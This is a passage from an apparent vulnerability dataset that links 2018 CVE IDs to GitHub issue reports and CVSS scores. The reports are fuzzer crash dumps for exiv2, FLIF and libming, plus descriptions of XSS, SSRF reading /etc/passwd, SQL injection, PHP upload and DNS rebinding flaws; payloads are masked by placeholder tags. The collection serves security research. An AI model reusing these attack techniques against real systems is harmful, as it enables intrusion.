  19009. "CVE_ID": "CVE-2018-10958",
  19010. "Issue_Url_old": "https://github.com/Exiv2/exiv2/issues/302",
  19011. "Issue_Url_new": "https://github.com/exiv2/exiv2/issues/302",
  19012. "Repo_new": "exiv2/exiv2",
  19013. "Issue_Created_At": "2018-05-09T13:38:53Z",
  19014. "description": "SIGABRT in types.cpp APITAG function. APITAG registers ]\u2500\u2500\u2500\u2500 $ra NUMBERTAG rb NUMBERTAG fffffffd NUMBERTAG rc NUMBERTAG ec0fed NUMBERTAG e NUMBERTAG rd NUMBERTAG fffffffd NUMBERTAG rsp NUMBERTAG fffffffd NUMBERTAG rbp NUMBERTAG ffffffea $rsi NUMBERTAG ffffffea $rdi NUMBERTAG rip NUMBERTAG c7 \u2192 APITAG mov rdi, rbp $r NUMBERTAG ffffffffffffe NUMBERTAG r NUMBERTAG ffffffffffffe NUMBERTAG r NUMBERTAG ffffffffffffe2f0 $r NUMBERTAG a $r NUMBERTAG ec NUMBERTAG b NUMBERTAG bcaea NUMBERTAG r NUMBERTAG c $r NUMBERTAG r NUMBERTAG eflags: [carry PARITY adjust ZERO sign trap INTERRUPT direction overflow resume virtual NUMBERTAG identification] $es NUMBERTAG gs NUMBERTAG ds NUMBERTAG ss NUMBERTAG b $fs NUMBERTAG cs NUMBERTAG APITAG stack NUMBERTAG fffffffd NUMBERTAG rsp NUMBERTAG fffffffd NUMBERTAG fffffffd NUMBERTAG fffffffd NUMBERTAG fffffff NUMBERTAG fffffffd NUMBERTAG APITAG mov rdi, QWORD PTR [rb NUMBERTAG fffffffd NUMBERTAG ffffffea NUMBERTAG fffffffd NUMBERTAG a NUMBERTAG c0e3e1fcb NUMBERTAG fffffffd NUMBERTAG ec0fd NUMBERTAG e6d6f NUMBERTAG a4c4d NUMBERTAG fffffffd NUMBERTAG fffffffd NUMBERTAG APITAG code:i NUMBERTAG b0 APITAG lea rsp, [rsp NUMBERTAG b8 APITAG mov QWORD PTR [rb NUMBERTAG bf APITAG mov QWORD PTR [rb NUMBERTAG c7 APITAG mov rdi, rbp NUMBERTAG ca APITAG call NUMBERTAG ac0 APITAG NUMBERTAG cf APITAG mov QWORD PTR [rb NUMBERTAG rbp NUMBERTAG d3 APITAG mov QWORD PTR [rbx], ra NUMBERTAG d6 APITAG add rsp NUMBERTAG da APITAG pop rbx APITAG APITAG NUMBERTAG if (size > size NUMBERTAG APITAG APITAG NUMBERTAG APITAG NUMBERTAG size NUMBERTAG size NUMBERTAG ffffffea NUMBERTAG APITAG = new byte[size NUMBERTAG size_ = size NUMBERTAG std::pair<byte , long> APITAG APITAG threads NUMBERTAG Id NUMBERTAG Name: \"exi NUMBERTAG stopped, reason: SINGLE STEP APITAG trace NUMBERTAG c7 \u2192 Name: APITAG size NUMBERTAG ffffffea NUMBERTAG Name: APITAG \"\", APITAG arr= APITAG NUMBERTAG Name: APITAG MENTIONTAG keysize NUMBERTAG c, APITAG NUMBERTAG fe \u2192 Name: APITAG data= MENTIONTAG APITAG NUMBERTAG Name: APITAG NUMBERTAG Name: APITAG NUMBERTAG d NUMBERTAG Name: APITAG APITAG NUMBERTAG d \u2192 Name: main(argc NUMBERTAG arg NUMBERTAG fffffffdf NUMBERTAG fffbe NUMBERTAG Name: APITAG <main(int, char const )>, argc NUMBERTAG arg NUMBERTAG fffffffdf NUMBERTAG init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end NUMBERTAG fffffffdf NUMBERTAG c9 \u2192 Name: APITAG APITAG gef\u27a4 terminate called after throwing an instance of 'std::bad_alloc' APITAG std::bad_alloc Program received signal SIGABRT, Aborted. I find this when I set \u2018ulimit NUMBERTAG G)\u2019. [ URLTAG url",
  19015. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  19016. "severity": "MEDIUM",
  19017. "baseScore": 6.5,
  19018. "impactScore": 3.6,
  19019. "exploitabilityScore": 2.8
  19020. },
  19021. {
  19022. "CVE_ID": "CVE-2018-10971",
  19023. "Issue_Url_old": "https://github.com/FLIF-hub/FLIF/issues/501",
  19024. "Issue_Url_new": "https://github.com/flif-hub/flif/issues/501",
  19025. "Repo_new": "flif-hub/flif",
  19026. "Issue_Created_At": "2018-05-08T03:43:44Z",
  19027. "description": "BUG Program received signal SIGSEGV, Segmentation fault. I used the AFL tool to find the bug of the APITAG method, The following is which is the gdb stack FILETAG Then the following is gdb's instructions and registers (gdb) x/i $pc NUMBERTAG ac NUMBERTAG a <image_load_pnm(char const , Image NUMBERTAG mov (%rdi),%r NUMBERTAG gdb) i r ra NUMBERTAG ffffffff NUMBERTAG rb NUMBERTAG ffffffff NUMBERTAG rc NUMBERTAG rd NUMBERTAG rsi NUMBERTAG rdi NUMBERTAG rbp NUMBERTAG rsp NUMBERTAG fffffffdd NUMBERTAG fffffffdd NUMBERTAG r NUMBERTAG ffff7fca NUMBERTAG r NUMBERTAG f6c6c NUMBERTAG r NUMBERTAG fffffffdb NUMBERTAG r NUMBERTAG r NUMBERTAG r NUMBERTAG r NUMBERTAG fffffffdfb NUMBERTAG r NUMBERTAG fffffe NUMBERTAG rip NUMBERTAG ac NUMBERTAG a NUMBERTAG ac NUMBERTAG a <image_load_pnm(char const , Image NUMBERTAG eflags NUMBERTAG PF ZF IF RF ] cs NUMBERTAG ss NUMBERTAG b NUMBERTAG ds NUMBERTAG es NUMBERTAG fs NUMBERTAG gs NUMBERTAG",
  19028. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  19029. "severity": "MEDIUM",
  19030. "baseScore": 5.5,
  19031. "impactScore": 3.6,
  19032. "exploitabilityScore": 1.8
  19033. },
  19034. {
  19035. "CVE_ID": "CVE-2018-10972",
  19036. "Issue_Url_old": "https://github.com/FLIF-hub/FLIF/issues/503",
  19037. "Issue_Url_new": "https://github.com/flif-hub/flif/issues/503",
  19038. "Repo_new": "flif-hub/flif",
  19039. "Issue_Created_At": "2018-05-08T08:02:04Z",
  19040. "description": "ERROR Segmentation fault APITAG The third Error is also Segmentation fault .I also use AFL tools The error is : Starting program: PATHTAG e PATHTAG APITAG overwrite Warning: expected \".png\", \".pnm\" or \".pam\" file name extension for input file, trying anyway... Program received signal SIGSEGV, Segmentation fault. APITAG (this=<optimized out>, APITAG rac=...) at APITAG",
  19041. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  19042. "severity": "HIGH",
  19043. "baseScore": 7.8,
  19044. "impactScore": 5.9,
  19045. "exploitabilityScore": 1.8
  19046. },
  19047. {
  19048. "CVE_ID": "CVE-2018-1098",
  19049. "Issue_Url_old": "https://github.com/coreos/etcd/issues/9353",
  19050. "Issue_Url_new": "https://github.com/etcd-io/etcd/issues/9353",
  19051. "Repo_new": "etcd-io/etcd",
  19052. "Issue_Created_At": "2018-02-25T11:50:25Z",
  19053. "description": "Mitigate CSRF and DNS Rebinding attacks. After explaining the issue in private with the security mailing list, we determined it is low enough in severity to make it a public discussion. This issue is relevant only to etcd deployment on local networks with no authentication scheme set up. It may not be a common scenario but it affects anyone who work with etcd locally or on a local network and use it without authentication, which is the default. For the sake of demonstration, I'm using a scenario where etcd is deployed on localhost. This can be any LAN address though (the attacker would have to know the address as a perquisite, but localhost is pretty common). The first issue is with CSRF URLTAG . An attacker can set up a website that tries to send a POST request to the etcd server and modify a key. Adding a key is done with PUT so it is theoretically safe (can't PUT from an HTML form or such) but POST allows creating in order keys that an attacker can send. Example APITAG CODETAG The second issue is with DNS rebinding URLTAG . It essentially means an attacker can control his DNS records to direct to localhost, and trick the browser into sending requests to localhost (or any other address). There are many resources on how this attack works. I've set up a live APITAG at FILETAG (based on taviso's work CVETAG . If the issue is unclear though please let me know and I will explain the attack in further details. Success example: FILETAG Whitelisting hostnames is a possible simple solution. See taviso's comment CVETAG on this or the fix URLTAG he sent to Transmission.",
  19054. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  19055. "severity": "HIGH",
  19056. "baseScore": 8.8,
  19057. "impactScore": 5.9,
  19058. "exploitabilityScore": 2.8
  19059. },
  19060. {
  19061. "CVE_ID": "CVE-2018-10998",
  19062. "Issue_Url_old": "https://github.com/Exiv2/exiv2/issues/303",
  19063. "Issue_Url_new": "https://github.com/exiv2/exiv2/issues/303",
  19064. "Repo_new": "exiv2/exiv2",
  19065. "Issue_Created_At": "2018-05-10T01:16:20Z",
  19066. "description": "SIGABRT in src/jp2image.cpp Safe::add. RA NUMBERTAG RB NUMBERTAG ec0d NUMBERTAG APITAG in addition\") RC NUMBERTAG ffff NUMBERTAG b NUMBERTAG APITAG : cmp ra NUMBERTAG fffffffffffff NUMBERTAG RD NUMBERTAG RSI NUMBERTAG RDI NUMBERTAG RBP NUMBERTAG e NUMBERTAG c NUMBERTAG ffff6ccb NUMBERTAG fbad NUMBERTAG RSP NUMBERTAG fffffffcf NUMBERTAG ffff NUMBERTAG d NUMBERTAG a ( APITAG : mov rdx,QWORD PTR fs NUMBERTAG RIP NUMBERTAG ffff NUMBERTAG b NUMBERTAG APITAG : cmp ra NUMBERTAG fffffffffffff NUMBERTAG R NUMBERTAG ffff6ccc NUMBERTAG R NUMBERTAG ffff7fd NUMBERTAG ffff7fd NUMBERTAG R NUMBERTAG R NUMBERTAG R NUMBERTAG ec0aa NUMBERTAG R NUMBERTAG ba NUMBERTAG b NUMBERTAG e0 APITAG lea rsp, rsp NUMBERTAG R NUMBERTAG fffffffd NUMBERTAG R NUMBERTAG EFLAGS NUMBERTAG carry parity adjust zero sign trap INTERRUPT direction overflow) [ code NUMBERTAG ffff NUMBERTAG b NUMBERTAG e APITAG : mov ea NUMBERTAG ea NUMBERTAG ffff NUMBERTAG b NUMBERTAG APITAG : movsxd rdi,ec NUMBERTAG ffff NUMBERTAG b NUMBERTAG APITAG : syscall NUMBERTAG ffff NUMBERTAG b NUMBERTAG APITAG : cmp ra NUMBERTAG fffffffffffff NUMBERTAG ffff NUMBERTAG b NUMBERTAG e APITAG : ja NUMBERTAG ffff NUMBERTAG b NUMBERTAG APITAG NUMBERTAG ffff NUMBERTAG b NUMBERTAG APITAG : repz ret NUMBERTAG ffff NUMBERTAG b NUMBERTAG APITAG : nop WORD PTR [rax+ra NUMBERTAG ffff NUMBERTAG b NUMBERTAG APITAG : test ecx,ecx [ stack NUMBERTAG fffffffcf NUMBERTAG ffff NUMBERTAG d NUMBERTAG a ( APITAG : mov rdx,QWORD PTR fs NUMBERTAG fffffffcf NUMBERTAG fffffffcf NUMBERTAG fffffffcf NUMBERTAG fffffffcf NUMBERTAG fffffffcfa NUMBERTAG fffffffcfa NUMBERTAG fffffffcfb NUMBERTAG Legend: code, data, rodata, value Stopped reason: SIGABRT NUMBERTAG ffff NUMBERTAG b NUMBERTAG in __GI_raise (sig=sig APITAG at PATHTAG NUMBERTAG PATHTAG No such file or directory. [ Legend: Modified register | Code | Heap | Stack | String ] APITAG registers ]\u2500\u2500\u2500\u2500 $ra NUMBERTAG rb NUMBERTAG ec0d NUMBERTAG APITAG in addition\" $rc NUMBERTAG ffff NUMBERTAG b NUMBERTAG fffff NUMBERTAG d NUMBERTAG H=\"?) $rd NUMBERTAG rsp NUMBERTAG fffffffcf NUMBERTAG ffff NUMBERTAG d NUMBERTAG a \u2192 APITAG mov rdx, QWORD PTR fs NUMBERTAG rbp NUMBERTAG e NUMBERTAG c NUMBERTAG ffff6ccb NUMBERTAG fbad NUMBERTAG rsi NUMBERTAG rdi NUMBERTAG rip NUMBERTAG ffff NUMBERTAG b NUMBERTAG fffff NUMBERTAG d NUMBERTAG H=\"?) $r NUMBERTAG ffff6ccc NUMBERTAG r NUMBERTAG ffff7fd NUMBERTAG ffff7fd NUMBERTAG loop detected] $r NUMBERTAG r NUMBERTAG r NUMBERTAG ec0aa NUMBERTAG r NUMBERTAG ba NUMBERTAG b NUMBERTAG e0 \u2192 APITAG lea rsp, [rsp NUMBERTAG r NUMBERTAG fffffffd NUMBERTAG r NUMBERTAG eflags: [carry parity adjust zero sign trap INTERRUPT direction overflow resume virtual NUMBERTAG identification] $gs NUMBERTAG fs NUMBERTAG ss NUMBERTAG b $ds NUMBERTAG es NUMBERTAG cs NUMBERTAG APITAG stack NUMBERTAG fffffffcf NUMBERTAG ffff NUMBERTAG d NUMBERTAG a \u2192 APITAG mov rdx, QWORD PTR fs NUMBERTAG rsp NUMBERTAG fffffffcf NUMBERTAG fffffffcf NUMBERTAG fffffffcf NUMBERTAG fffffffcf NUMBERTAG fffffffcfa NUMBERTAG fffffffcfa NUMBERTAG fffffffcfb NUMBERTAG APITAG code:i NUMBERTAG ffff NUMBERTAG b NUMBERTAG e APITAG mov ea NUMBERTAG ea NUMBERTAG ffff NUMBERTAG b NUMBERTAG APITAG movsxd rdi, ec NUMBERTAG ffff NUMBERTAG b NUMBERTAG APITAG syscall NUMBERTAG ffff NUMBERTAG b NUMBERTAG APITAG cmp ra NUMBERTAG fffffffffffff NUMBERTAG ffff NUMBERTAG b NUMBERTAG e APITAG ja NUMBERTAG ffff NUMBERTAG b NUMBERTAG APITAG NUMBERTAG ffff NUMBERTAG b NUMBERTAG APITAG repz ret NUMBERTAG ffff NUMBERTAG b NUMBERTAG APITAG nop WORD PTR [rax+ra NUMBERTAG ffff NUMBERTAG b NUMBERTAG APITAG test ecx, ec NUMBERTAG ffff NUMBERTAG b NUMBERTAG a APITAG jg NUMBERTAG ffff NUMBERTAG b NUMBERTAG b APITAG APITAG threads NUMBERTAG Id NUMBERTAG Name: \"exi NUMBERTAG stopped, reason: SIGABRT APITAG trace NUMBERTAG ffff NUMBERTAG b NUMBERTAG Name: __GI_raise(sig NUMBERTAG ffff NUMBERTAG d NUMBERTAG a \u2192 Name: APITAG NUMBERTAG ffff NUMBERTAG e NUMBERTAG d \u2192 Name: APITAG NUMBERTAG ffff NUMBERTAG c6b6 \u2192 call NUMBERTAG ffff NUMBERTAG fc0 APITAG NUMBERTAG ffff NUMBERTAG c NUMBERTAG Name: APITAG NUMBERTAG ffff NUMBERTAG c NUMBERTAG Name: APITAG NUMBERTAG c6a \u2192 Name: Safe::add<unsigned int>(summand NUMBERTAG summand NUMBERTAG optimized out NUMBERTAG c6a \u2192 Name: APITAG out NUMBERTAG ab NUMBERTAG Name: APITAG NUMBERTAG fa0 \u2192 Name: APITAG PATHTAG ) command: exi NUMBERTAG et [poc] [ URLTAG url",
  19067. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  19068. "severity": "MEDIUM",
  19069. "baseScore": 6.5,
  19070. "impactScore": 3.6,
  19071. "exploitabilityScore": 2.8
  19072. },
  19073. {
  19074. "CVE_ID": "CVE-2018-10999",
  19075. "Issue_Url_old": "https://github.com/Exiv2/exiv2/issues/306",
  19076. "Issue_Url_new": "https://github.com/exiv2/exiv2/issues/306",
  19077. "Repo_new": "exiv2/exiv2",
  19078. "Issue_Created_At": "2018-05-10T09:43:16Z",
  19079. "description": "heap buffer overflow on APITAG APITAG NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG a NUMBERTAG f NUMBERTAG at pc NUMBERTAG fa NUMBERTAG d NUMBERTAG b NUMBERTAG b bp NUMBERTAG ffd NUMBERTAG ERRORTAG NUMBERTAG b0 sp NUMBERTAG ffd NUMBERTAG c NUMBERTAG READ of size NUMBERTAG at NUMBERTAG a NUMBERTAG f NUMBERTAG thread T NUMBERTAG fa NUMBERTAG d NUMBERTAG b NUMBERTAG a in __interceptor_strlen ( PATHTAG NUMBERTAG fa NUMBERTAG d3ce8bf in APITAG const&, int, APITAG ( PATHTAG NUMBERTAG fa NUMBERTAG d3ced0a in APITAG , APITAG const&, APITAG ( PATHTAG NUMBERTAG fa NUMBERTAG d3cb NUMBERTAG in APITAG ( PATHTAG NUMBERTAG in APITAG const ( PATHTAG NUMBERTAG in APITAG std::char_traits APITAG , std::allocator APITAG > const&) ( PATHTAG NUMBERTAG dbd in main ( PATHTAG NUMBERTAG fa NUMBERTAG c8f NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG in _start ( PATHTAG NUMBERTAG a NUMBERTAG f NUMBERTAG is located NUMBERTAG bytes to the right of NUMBERTAG byte region APITAG allocated by thread T0 here NUMBERTAG fa NUMBERTAG d7a NUMBERTAG b2 in operator APITAG long) ( PATHTAG NUMBERTAG fa NUMBERTAG d3cae NUMBERTAG in APITAG ( PATHTAG ) SUMMARY: APITAG heap buffer overflow NUMBERTAG interceptor_strlen Shadow bytes around the buggy address NUMBERTAG c NUMBERTAG fffbe NUMBERTAG c NUMBERTAG fffbea NUMBERTAG c NUMBERTAG fffbeb NUMBERTAG c NUMBERTAG fffbec NUMBERTAG c NUMBERTAG fffbed NUMBERTAG c NUMBERTAG fffbee NUMBERTAG fa]fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fffbef0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fffbf NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fffbf NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fffbf NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fffbf NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe NUMBERTAG ABORTING command: exi NUMBERTAG et [poc] [ URLTAG url",
  19080. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  19081. "severity": "MEDIUM",
  19082. "baseScore": 6.5,
  19083. "impactScore": 3.6,
  19084. "exploitabilityScore": 2.8
  19085. },
  19086. {
  19087. "CVE_ID": "CVE-2018-11011",
  19088. "Issue_Url_old": "https://github.com/ruibaby/halo/issues/9",
  19089. "Issue_Url_new": "https://github.com/ruibaby/halo/issues/9",
  19090. "Repo_new": "ruibaby/halo",
  19091. "Issue_Created_At": "2018-05-11T09:43:02Z",
  19092. "description": "These are two stored xss vulnerability. The first place > The front comment APITAG field is not strictly filtered Vulnerability code > APITAG CODETAG Payload APITAG Second place > When login failed at the background, the failed login username and password are written to the log without xss filtering, and displayed on the background home page, resulting in storage xss vulnerability. Vulnerability code > APITAG ERRORTAG Payload APITAG",
  19093. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  19094. "severity": "MEDIUM",
  19095. "baseScore": 6.1,
  19096. "impactScore": 2.7,
  19097. "exploitabilityScore": 2.8
  19098. },
  19099. {
  19100. "CVE_ID": "CVE-2018-11031",
  19101. "Issue_Url_old": "https://github.com/gouguoyin/phprap/issues/89",
  19102. "Issue_Url_new": "https://github.com/gouguoyin/phprap/issues/89",
  19103. "Repo_new": "gouguoyin/phprap",
  19104. "Issue_Created_At": "2018-05-11T01:31:20Z",
  19105. "description": "There is SSRF and sql injection vulnerability that can attack website and local area network NUMBERTAG SSRF vulnerability file: PATHTAG NUMBERTAG line ERRORTAG This method does not restrict the http request of the intranet address, it can cause SSRF attack For example, the following request APITAG You can see that the server returned the contents of the /etc/passwd NUMBERTAG sql injection file: PATHTAG NUMBERTAG line ERRORTAG you can see in line NUMBERTAG APITAG the splicing string method for sql statement generation\uff0cit will cause sql injection attack",
  19106. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  19107. "severity": "CRITICAL",
  19108. "baseScore": 9.8,
  19109. "impactScore": 5.9,
  19110. "exploitabilityScore": 3.9
  19111. },
  19112. {
  19113. "CVE_ID": "CVE-2018-11037",
  19114. "Issue_Url_old": "https://github.com/Exiv2/exiv2/issues/307",
  19115. "Issue_Url_new": "https://github.com/exiv2/exiv2/issues/307",
  19116. "Repo_new": "exiv2/exiv2",
  19117. "Issue_Created_At": "2018-05-13T07:00:35Z",
  19118. "description": "SEGV on APITAG ERRORTAG The command line is exi NUMBERTAG pR FILETAG",
  19119. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N",
  19120. "severity": "MEDIUM",
  19121. "baseScore": 6.5,
  19122. "impactScore": 3.6,
  19123. "exploitabilityScore": 2.8
  19124. },
  19125. {
  19126. "CVE_ID": "CVE-2018-11095",
  19127. "Issue_Url_old": "https://github.com/libming/libming/issues/141",
  19128. "Issue_Url_new": "https://github.com/libming/libming/issues/141",
  19129. "Repo_new": "libming/libming",
  19130. "Issue_Created_At": "2018-05-14T12:56:04Z",
  19131. "description": "SIGSEV in APITAG in APITAG URLTAG URLTAG (gdb) set args POC2 (gdb) r header indicates a filesize of NUMBERTAG but filesize is NUMBERTAG APITAG APITAG $m APITAG NUMBERTAG m APITAG Stream out of sync after parse of blocktype NUMBERTAG SWF_DOACTION NUMBERTAG but expecting NUMBERTAG SWF_DOACTION / Program received signal SIGSEGV, Segmentation fault NUMBERTAG a1e9 in APITAG (maxn NUMBERTAG actions NUMBERTAG n NUMBERTAG at APITAG NUMBERTAG if (sactif APITAG APITAG APITAG (gdb) bt NUMBERTAG a1e9 in APITAG (maxn NUMBERTAG actions NUMBERTAG n NUMBERTAG at APITAG NUMBERTAG APITAG (n NUMBERTAG actions NUMBERTAG maxn NUMBERTAG at APITAG NUMBERTAG a NUMBERTAG in APITAG (indent=<optimized out>, actions NUMBERTAG n NUMBERTAG at APITAG NUMBERTAG APITAG (n=<optimized out>, actions=<optimized out>, maxn=<optimized out>, is_type2=<optimized out>) at APITAG NUMBERTAG d in APITAG (indent=<optimized out>, actions NUMBERTAG a0, n NUMBERTAG at APITAG NUMBERTAG APITAG (n NUMBERTAG actions NUMBERTAG a0, indent=indent APITAG at APITAG NUMBERTAG f NUMBERTAG a in APITAG (pblock NUMBERTAG at APITAG NUMBERTAG e in APITAG (f NUMBERTAG at APITAG NUMBERTAG main (argc=<optimized out>, argv=<optimized out>) at APITAG (gdb) info all registers ra NUMBERTAG rb NUMBERTAG rc NUMBERTAG rd NUMBERTAG rsi NUMBERTAG ffffffffffffffb NUMBERTAG rdi NUMBERTAG rbp NUMBERTAG rsp NUMBERTAG fffffffe1e NUMBERTAG fffffffe1e0 r NUMBERTAG d NUMBERTAG r NUMBERTAG r NUMBERTAG r NUMBERTAG r NUMBERTAG r NUMBERTAG r NUMBERTAG r NUMBERTAG rip NUMBERTAG a1e NUMBERTAG a1e9 APITAG eflags NUMBERTAG PF ZF IF RF ] cs NUMBERTAG ss NUMBERTAG b NUMBERTAG ds NUMBERTAG es NUMBERTAG fs NUMBERTAG gs NUMBERTAG st NUMBERTAG raw NUMBERTAG st NUMBERTAG raw NUMBERTAG st NUMBERTAG raw NUMBERTAG st NUMBERTAG raw NUMBERTAG Type APITAG to continue, or q APITAG to quit st NUMBERTAG raw NUMBERTAG st NUMBERTAG raw NUMBERTAG st NUMBERTAG raw NUMBERTAG st NUMBERTAG raw NUMBERTAG fctrl NUMBERTAG f NUMBERTAG fstat NUMBERTAG ftag NUMBERTAG ffff NUMBERTAG fiseg NUMBERTAG fioff NUMBERTAG foseg NUMBERTAG fooff NUMBERTAG fop NUMBERTAG mxcsr NUMBERTAG f NUMBERTAG IM DM ZM OM UM PM ] Breakpoint NUMBERTAG APITAG (maxn NUMBERTAG actions NUMBERTAG n NUMBERTAG at APITAG NUMBERTAG if (sactif APITAG APITAG APITAG (gdb) l NUMBERTAG if APITAG n+i+j, maxn) == SWFACTION_IF NUMBERTAG sactif = (struct SWF_ACTIONIF )&(actions[n+i+j NUMBERTAG chk whether last jump does lead us back to start of loop NUMBERTAG if (sactif APITAG APITAG APITAG NUMBERTAG sactif APITAG APITAG APITAG NUMBERTAG sactif APITAG APITAG APITAG NUMBERTAG APITAG NUMBERTAG",
  19132. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  19133. "severity": "HIGH",
  19134. "baseScore": 8.8,
  19135. "impactScore": 5.9,
  19136. "exploitabilityScore": 2.8
  19137. },
  19138. {
  19139. "CVE_ID": "CVE-2018-11097",
  19140. "Issue_Url_old": "https://github.com/cloudwu/cstring/issues/6",
  19141. "Issue_Url_new": "https://github.com/cloudwu/cstring/issues/6",
  19142. "Repo_new": "cloudwu/cstring",
  19143. "Issue_Created_At": "2018-05-14T06:58:46Z",
  19144. "description": "There is a memory leak vulnerability. APITAG NUMBERTAG ERROR: APITAG detected memory leaks Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG f NUMBERTAG a0 ( PATHTAG ) SUMMARY: APITAG NUMBERTAG byte(s) leaked in NUMBERTAG allocation(s).",
  19145. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  19146. "severity": "HIGH",
  19147. "baseScore": 7.5,
  19148. "impactScore": 3.6,
  19149. "exploitabilityScore": 3.9
  19150. },
  19151. {
  19152. "CVE_ID": "CVE-2018-11098",
  19153. "Issue_Url_old": "https://github.com/philippe/FrogCMS/issues/11",
  19154. "Issue_Url_new": "https://github.com/philippe/frogcms/issues/11",
  19155. "Repo_new": "philippe/frogcms",
  19156. "Issue_Created_At": "2018-05-14T03:28:22Z",
  19157. "description": "Frog CMS NUMBERTAG has a file upload Vulnerability. The first step is to click the upload button APITAG The second step is to upload php script APITAG Last successful execution APITAG Look at the file upload function\uff0cthere is a is APITAG APITAG follow the APITAG judgment file type\u3002 APITAG",
  19158. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  19159. "severity": "HIGH",
  19160. "baseScore": 7.2,
  19161. "impactScore": 5.9,
  19162. "exploitabilityScore": 1.2
  19163. },
  19164. {
  19165. "CVE_ID": "CVE-2018-11100",
  19166. "Issue_Url_old": "https://github.com/libming/libming/issues/142",
  19167. "Issue_Url_new": "https://github.com/libming/libming/issues/142",
  19168. "Repo_new": "libming/libming",
  19169. "Issue_Created_At": "2018-05-15T00:29:54Z",
  19170. "description": "SIGSEV in APITAG in APITAG URLTAG Program received signal SIGSEGV, Segmentation fault. APITAG (n NUMBERTAG actions NUMBERTAG cb0, maxn NUMBERTAG is_type2=<optimized out>) at APITAG NUMBERTAG if ( name) (gdb) bt NUMBERTAG APITAG (n NUMBERTAG actions NUMBERTAG cb0, maxn NUMBERTAG is_type2=<optimized out>) at APITAG NUMBERTAG in APITAG (indent NUMBERTAG actions NUMBERTAG cb0, n NUMBERTAG at APITAG NUMBERTAG APITAG (n NUMBERTAG actions NUMBERTAG maxn=<optimized out>) at APITAG NUMBERTAG a NUMBERTAG in APITAG (indent=<optimized out>, actions NUMBERTAG n NUMBERTAG at APITAG NUMBERTAG APITAG (n=<optimized out>, actions=<optimized out>, maxn=<optimized out>, is_type2=<optimized out>) at APITAG NUMBERTAG d in APITAG (indent=<optimized out>, actions NUMBERTAG n NUMBERTAG at APITAG NUMBERTAG APITAG (n NUMBERTAG actions NUMBERTAG indent=indent APITAG at APITAG NUMBERTAG f NUMBERTAG a in APITAG (pblock NUMBERTAG at APITAG NUMBERTAG e in APITAG (f NUMBERTAG at APITAG NUMBERTAG main (argc=<optimized out>, argv=<optimized out>) at APITAG (gdb) l NUMBERTAG int action_cnt NUMBERTAG char name NUMBERTAG APITAG NUMBERTAG name = is_type2 ? APITAG : sact APITAG NUMBERTAG if ( name NUMBERTAG INDENT NUMBERTAG APITAG {\" ,name NUMBERTAG while(action_cnt+n<maxn) (gdb) info all registers ra NUMBERTAG rb NUMBERTAG rc NUMBERTAG c NUMBERTAG rd NUMBERTAG c NUMBERTAG rsi NUMBERTAG a NUMBERTAG rdi NUMBERTAG c NUMBERTAG rbp NUMBERTAG rsp NUMBERTAG fffffffe NUMBERTAG fffffffe NUMBERTAG r NUMBERTAG r NUMBERTAG a2ff NUMBERTAG r NUMBERTAG fffffffffffa5c NUMBERTAG r NUMBERTAG ffff NUMBERTAG c NUMBERTAG r NUMBERTAG r NUMBERTAG r NUMBERTAG cb NUMBERTAG r NUMBERTAG a NUMBERTAG rip NUMBERTAG f NUMBERTAG e NUMBERTAG f NUMBERTAG e APITAG eflags NUMBERTAG PF ZF IF RF ] cs NUMBERTAG ss NUMBERTAG b NUMBERTAG ds NUMBERTAG es NUMBERTAG fs NUMBERTAG gs NUMBERTAG st NUMBERTAG raw NUMBERTAG st NUMBERTAG raw NUMBERTAG st NUMBERTAG raw NUMBERTAG st NUMBERTAG raw NUMBERTAG Type APITAG to continue, or q APITAG to quit st NUMBERTAG raw NUMBERTAG st NUMBERTAG raw NUMBERTAG st NUMBERTAG raw NUMBERTAG st NUMBERTAG raw NUMBERTAG fctrl NUMBERTAG f NUMBERTAG fstat NUMBERTAG ftag NUMBERTAG ffff NUMBERTAG fiseg NUMBERTAG fioff NUMBERTAG foseg NUMBERTAG fooff NUMBERTAG fop NUMBERTAG",
  19171. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  19172. "severity": "HIGH",
  19173. "baseScore": 8.8,
  19174. "impactScore": 5.9,
  19175. "exploitabilityScore": 2.8
